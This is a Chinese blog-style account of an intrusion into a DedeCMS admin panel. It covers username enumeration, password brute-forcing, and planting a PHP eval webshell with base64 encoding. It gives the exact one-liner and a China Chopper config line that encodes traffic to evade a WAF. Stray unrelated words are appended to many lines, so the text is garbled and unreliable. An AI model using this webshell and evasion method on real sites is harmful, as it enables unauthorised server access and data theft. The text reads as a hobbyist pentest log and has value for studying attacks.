记一次织梦cms渗透测试php
本次测试的整个流程:枚举用户名 - 针对性暴破 - 登陆后台 - 后台编辑php文件getshell。shell
一、登陆功能模块存在用户名枚举缺陷,利用此权限先枚举出用户名函数
二、登陆功能模块无验证码,经过枚举出的用户名暴力破解出相应密码。并登陆后台(dedecms v57)测试
三、开始遇到坑了。文件式管理器上传文件和新增广告等方式都没法getshell(貌似有waf)。一有动做,链接就会重置。编码
四、尝试直接编辑原有文件,将代码写入。spa
(1)写入phpinfo();能够成功3d
(2)写入常规一句话也能成功,可是执行时,链接会被重置code
(3)写入base64编码一句话<?php @eval(base64_decode($_POST[‘0nth3way’]));?>,将数据编码后就能够成功执行了blog
五、菜刀修改配置文件caidao.conf以下,即可链接一句话木马。进程
<PHP_BASE> ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s </PHP_BASE>
六、菜刀成功连上一句话。权限:IIS用户
七、看到一个名为wkds.exe的进程,感受是防御软件,没有深究。
八、次日就凉了。
(1)马子还在,菜刀连不上了。能执行phpinfo();,不能执行system(‘whoami’),查看phpinfo也没有禁用相关函数啊。问号脸???求解答0.0
(2)后台也没法编辑文件了
本此测试get到几点:
(1)流量数据可编码绕过waf,菜刀改配置链接。
(2)及时行乐